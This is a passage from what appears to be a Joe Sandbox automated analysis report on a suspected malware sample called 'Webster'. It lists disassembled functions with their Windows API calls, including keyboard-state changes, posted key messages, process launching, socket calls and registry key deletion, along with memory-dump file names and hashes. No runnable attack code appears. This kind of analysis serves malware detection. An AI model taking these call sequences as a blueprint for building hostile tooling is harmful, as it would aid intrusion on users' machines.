                                                                                  • _memmove.LIBCMT ref: 00AE7756
                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00AE7765
                                                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00AE777A
                                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00AE7799
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                  • String ID:
                                                                                  • API String ID: 256516436-0
                                                                                  • Opcode ID: 58fa774a8e6ae55b57a5dd8ed8f042d121d35a3b59c846a6905c1dc2016b579c
                                                                                  • Instruction ID: 3bf67c0d34d6f6479d4db5ce4b55592956af568e5cf00c41f9fef05cc2165737
                                                                                  • Opcode Fuzzy Hash: 58fa774a8e6ae55b57a5dd8ed8f042d121d35a3b59c846a6905c1dc2016b579c
                                                                                  • Instruction Fuzzy Hash: B2317031904109EBDB10EF55DD85EAEB7B8EF45310F1480A5FD04AB296DB709A50DBA0
                                                                                  Function 00B067F8 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • DeleteObject.GDI32(00000000), ref: 00B06810
                                                                                  • GetDC.USER32(00000000), ref: 00B06818
                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B06823
                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00B0682F
                                                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00B0686B
                                                                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00B0687C
                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00B0964F,?,?,000000FF,00000000,?,000000FF,?), ref: 00B068B6
                                                                                  • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00B068D6
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                  • String ID:
                                                                                  • API String ID: 3864802216-0
                                                                                  • Opcode ID: 95e64ef3e6d13a8adea04e6fe76b17d24e84fbed7e78438bdcb79920428f4df2
                                                                                  • Instruction ID: e5159c08e437ece4382a43e98e89b1cb483fecbe86cf945c7649b11870b0d12f
                                                                                  • Opcode Fuzzy Hash: 95e64ef3e6d13a8adea04e6fe76b17d24e84fbed7e78438bdcb79920428f4df2
                                                                                  • Instruction Fuzzy Hash: 9D316D72111214BFEB119F50DC4AFEA3FADEB49761F048055FE089A291DAB59C91CB70
                                                                                  Function 00ADC748 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memcmp
                                                                                  • String ID:
                                                                                  • API String ID: 2931989736-0
                                                                                  • Opcode ID: b3a1438c5efa031ca217f2d57e6f4286070f8be7144a735a27f04a009277b87d
                                                                                  • Instruction ID: 957bb56d10170c1cac9a48ee0cd38c1672726e4e3e55eb0c6012eb78222b62e6
                                                                                  • Opcode Fuzzy Hash: b3a1438c5efa031ca217f2d57e6f4286070f8be7144a735a27f04a009277b87d
                                                                                  • Instruction Fuzzy Hash: 0F219572A452077ADA0476119E82FEF37AC9E25BA4F844026FD07E7382F710DE11CAE1
                                                                                  Function 00AEF166 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00A84D37: __itow.LIBCMT ref: 00A84D62
                                                                                    • Part of subcall function 00A84D37: __swprintf.LIBCMT ref: 00A84DAC
                                                                                    • Part of subcall function 00A9436A: _wcscpy.LIBCMT ref: 00A9438D
                                                                                  • _wcstok.LIBCMT ref: 00AEF2D7
                                                                                  • _wcscpy.LIBCMT ref: 00AEF366
                                                                                  • _memset.LIBCMT ref: 00AEF399
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                  • String ID: X
                                                                                  • API String ID: 774024439-3081909835
                                                                                  • Opcode ID: 1dd4f472a2897ee51e098ab2aea452094e3142c347161a8c09718d5f1534298b
                                                                                  • Instruction ID: 5afa96b13c3df5ceac7b70ed6da994eae5d0774d9b0659143b51b44efa15fede
                                                                                  • Opcode Fuzzy Hash: 1dd4f472a2897ee51e098ab2aea452094e3142c347161a8c09718d5f1534298b
                                                                                  • Instruction Fuzzy Hash: 42C18E716043819FCB14EF65C981A5EB7E4FF85354F10492DF8999B2A2EB30EC45CB92
                                                                                  Function 00AF71EE Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00AF72EB
                                                                                  • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00AF730C
                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00AF731F
                                                                                  • htons.WSOCK32(?,?,?,00000000,?), ref: 00AF73D5
                                                                                  • inet_ntoa.WSOCK32(?), ref: 00AF7392
                                                                                    • Part of subcall function 00ADB4EA: _strlen.LIBCMT ref: 00ADB4F4
                                                                                    • Part of subcall function 00ADB4EA: _memmove.LIBCMT ref: 00ADB516
                                                                                  • _strlen.LIBCMT ref: 00AF742F
                                                                                  • _memmove.LIBCMT ref: 00AF7498
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                                  • String ID:
                                                                                  • API String ID: 3619996494-0
                                                                                  • Opcode ID: 9875b148a906c4c91b98a48d65da716814b8d12add6e3ef5707249e4c38b2dd7
                                                                                  • Instruction ID: d45b2b325cad129298305a29692576b714c812b917817812c0b3bb2f86cd9905
                                                                                  • Opcode Fuzzy Hash: 9875b148a906c4c91b98a48d65da716814b8d12add6e3ef5707249e4c38b2dd7
                                                                                  • Instruction Fuzzy Hash: 7981C271608205AFD710EB64CD81E6FB7F8AF88714F10451DFA569B292EB70DD41CB91
                                                                                  Function 00A81800 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 133ced0a70d2226a8065cc1bec4843ce614177a38e8162c5824fd45b982a6be0
                                                                                  • Instruction ID: 094cccb365fe8f95e8811e0b73512f6aa0108fc66aa31d2350ecfbf7abd0b3e1
                                                                                  • Opcode Fuzzy Hash: 133ced0a70d2226a8065cc1bec4843ce614177a38e8162c5824fd45b982a6be0
                                                                                  • Instruction Fuzzy Hash: 81713A70900109EFDB14AF98CC89AEEBB79FF86314F148159F915AB251C774AA52CFA0
                                                                                  Function 00B0B9C3 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • IsWindow.USER32(014C4E08), ref: 00B0BA5D
                                                                                  • IsWindowEnabled.USER32(014C4E08), ref: 00B0BA69
                                                                                  • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00B0BB4D
                                                                                  • SendMessageW.USER32(014C4E08,000000B0,?,?), ref: 00B0BB84
                                                                                  • IsDlgButtonChecked.USER32(?,?), ref: 00B0BBC1
                                                                                  • GetWindowLongW.USER32(014C4E08,000000EC), ref: 00B0BBE3
                                                                                  • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00B0BBFB
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                  • String ID:
                                                                                  • API String ID: 4072528602-0
                                                                                  • Opcode ID: 3c9b6bf54d13fed9768dd51d5268253b0e5dc086b443155a61ce16e62240101e
                                                                                  • Instruction ID: dca0ec57f2914aa7e3c9da45bc7f42d5ffc65421e54befcd167637ae85a8555d
                                                                                  • Opcode Fuzzy Hash: 3c9b6bf54d13fed9768dd51d5268253b0e5dc086b443155a61ce16e62240101e
                                                                                  • Instruction Fuzzy Hash: E9718A34A04204AFEB259F54C8D4FBABFE9EF49310F144499E986972A1CF31AD51DB60
                                                                                  Function 00AFFB07 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00AFFB31
                                                                                  • _memset.LIBCMT ref: 00AFFBFA
                                                                                  • ShellExecuteExW.SHELL32(?), ref: 00AFFC3F
                                                                                    • Part of subcall function 00A84D37: __itow.LIBCMT ref: 00A84D62
                                                                                    • Part of subcall function 00A84D37: __swprintf.LIBCMT ref: 00A84DAC
                                                                                    • Part of subcall function 00A9436A: _wcscpy.LIBCMT ref: 00A9438D
                                                                                  • GetProcessId.KERNEL32(00000000), ref: 00AFFCB6
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00AFFCE5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                                  • String ID: @
                                                                                  • API String ID: 3522835683-2766056989
                                                                                  • Opcode ID: ce68522e8c4682f727c6458467866e86972552eef7f927c34e6e4e549cc80bc5
                                                                                  • Instruction ID: 7d55c32ec960aad94ba153f7678d7674c2fd6cdcf375455589b086a46dfbb608
                                                                                  • Opcode Fuzzy Hash: ce68522e8c4682f727c6458467866e86972552eef7f927c34e6e4e549cc80bc5
                                                                                  • Instruction Fuzzy Hash: 9761BE75A00619DFCB14EFA4C5919AEB7F4FF48310F148569E916AB351DB30AD42CB90
                                                                                  Function 00AE174C Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetParent.USER32(?), ref: 00AE178B
                                                                                  • GetKeyboardState.USER32(?), ref: 00AE17A0
                                                                                  • SetKeyboardState.USER32(?), ref: 00AE1801
                                                                                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 00AE182F
                                                                                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 00AE184E
                                                                                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 00AE1894
                                                                                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00AE18B7
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                                  • String ID:
                                                                                  • API String ID: 87235514-0
                                                                                  • Opcode ID: 9a0a24f6b9f4c303d799c208671b3b69e6621b94cd0f04bf83045a9479727de7
                                                                                  • Instruction ID: 82ee237d462e5f9c117b7dd50a39d8cc1a502e0039d28e3e07e8c2d626395c81
                                                                                  • Opcode Fuzzy Hash: 9a0a24f6b9f4c303d799c208671b3b69e6621b94cd0f04bf83045a9479727de7
                                                                                  • Instruction Fuzzy Hash: 5851C3B0A187E53EFB364326CC55BBA7EE96B06700F088589E0D9468C3D6F89CD4DB50
                                                                                  Function 00AE1565 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetParent.USER32(00000000), ref: 00AE15A4
                                                                                  • GetKeyboardState.USER32(?), ref: 00AE15B9
                                                                                  • SetKeyboardState.USER32(?), ref: 00AE161A
                                                                                  • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00AE1646
                                                                                  • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00AE1663
                                                                                  • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00AE16A7
                                                                                  • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00AE16C8
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                                  • String ID:
                                                                                  • API String ID: 87235514-0
                                                                                  • Opcode ID: a170a9779a71585a42df9f7fb55414ea3857ba3f189fd33091bb17faad572855
                                                                                  • Instruction ID: d1e6e92d03ea65ae16656274c05b6e019b4381e2969852d15b7fb6b8f93f4b78
                                                                                  • Opcode Fuzzy Hash: a170a9779a71585a42df9f7fb55414ea3857ba3f189fd33091bb17faad572855
                                                                                  • Instruction Fuzzy Hash: 7351E7B06047E53DFB328726CC55BBABEA96B05300F0C8589E1D9578C2D6B4EC98E761
                                                                                  Function 00AE5BB8 Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcsncpy$LocalTime
                                                                                  • String ID:
                                                                                  • API String ID: 2945705084-0
                                                                                  • Opcode ID: d4484eae971f9d47439048779801d3b274a30f6c3f6fef9c30caaa00493da6f4
                                                                                  • Instruction ID: 5ecdc1792afdb0b0ad334896bdd4bc471586927c894a9e02b3898816d310f502
                                                                                  • Opcode Fuzzy Hash: d4484eae971f9d47439048779801d3b274a30f6c3f6fef9c30caaa00493da6f4
                                                                                  • Instruction Fuzzy Hash: 3841D366C2065875CF51FBB5CC86ACFB7B8AF06310F508856F509E3161E734A359C3A5
                                                                                  Function 00AE3B64 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00AE4BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00AE3B8A,?), ref: 00AE4BE0
                                                                                    • Part of subcall function 00AE4BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00AE3B8A,?), ref: 00AE4BF9
                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00AE3BAA
                                                                                  • _wcscmp.LIBCMT ref: 00AE3BC6
                                                                                  • MoveFileW.KERNEL32(?,?), ref: 00AE3BDE
                                                                                  • _wcscat.LIBCMT ref: 00AE3C26
                                                                                  • SHFileOperationW.SHELL32(?), ref: 00AE3C92
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                                  • String ID: \*.*
                                                                                  • API String ID: 1377345388-1173974218
                                                                                  • Opcode ID: 3f17f6cd981e14ee15bb22929100cf1a36b75182e5d43d77040ebba9f4b36218
                                                                                  • Instruction ID: 126a767007aa4ef79743f36ac13fc95b85d07c8bc67a1ac0346c90293efd02bf
                                                                                  • Opcode Fuzzy Hash: 3f17f6cd981e14ee15bb22929100cf1a36b75182e5d43d77040ebba9f4b36218
                                                                                  • Instruction Fuzzy Hash: 72418F7250C3849ACB52EF65C585ADFB7ECAF89340F50092EF48AC7191EB34D688C752
                                                                                  Function 00B078B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00B078CF
                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B07976
                                                                                  • IsMenu.USER32(?), ref: 00B0798E
                                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B079D6
                                                                                  • DrawMenuBar.USER32 ref: 00B079E9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                  • String ID: 0
                                                                                  • API String ID: 3866635326-4108050209
                                                                                  • Opcode ID: 3ee29b26f73b4948beff5d21c846ceeeb4d1e520bb34f84bb300c263659d1a20
                                                                                  • Instruction ID: d738b440c664465b0d2ce0818ac95067d8970cc8e6318d280d534dbc6606a22e
                                                                                  • Opcode Fuzzy Hash: 3ee29b26f73b4948beff5d21c846ceeeb4d1e520bb34f84bb300c263659d1a20
                                                                                  • Instruction Fuzzy Hash: 2B414975A44209EFDB10DF94D884EAABBFAFB05310F0481A9E95597290CB70AD50CFA0
                                                                                  Function 00B01602 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00B01631
                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B0165B
                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00B01712
                                                                                    • Part of subcall function 00B01602: RegCloseKey.ADVAPI32(?), ref: 00B01678
                                                                                    • Part of subcall function 00B01602: FreeLibrary.KERNEL32(?), ref: 00B016CA
                                                                                    • Part of subcall function 00B01602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00B016ED
                                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00B016B5
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                  • String ID:
                                                                                  • API String ID: 395352322-0
                                                                                  • Opcode ID: 91b949e569a5935aa1b8e92470421d241d3417ac7d7ecf85b94a461f9c3c4920
                                                                                  • Instruction ID: 98d70bee05690573226c61b7a28051d8e8029afe79dd37063c728013d617357a
                                                                                  • Opcode Fuzzy Hash: 91b949e569a5935aa1b8e92470421d241d3417ac7d7ecf85b94a461f9c3c4920
                                                                                  • Instruction Fuzzy Hash: B7313CB191010DFFDB199F94DC89AFEBBBCEF08300F4045A9F501A2190EA749E859AA0
                                                                                  Function 00B068F2 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00B06911
                                                                                  • GetWindowLongW.USER32(014C4E08,000000F0), ref: 00B06944
                                                                                  • GetWindowLongW.USER32(014C4E08,000000F0), ref: 00B06979
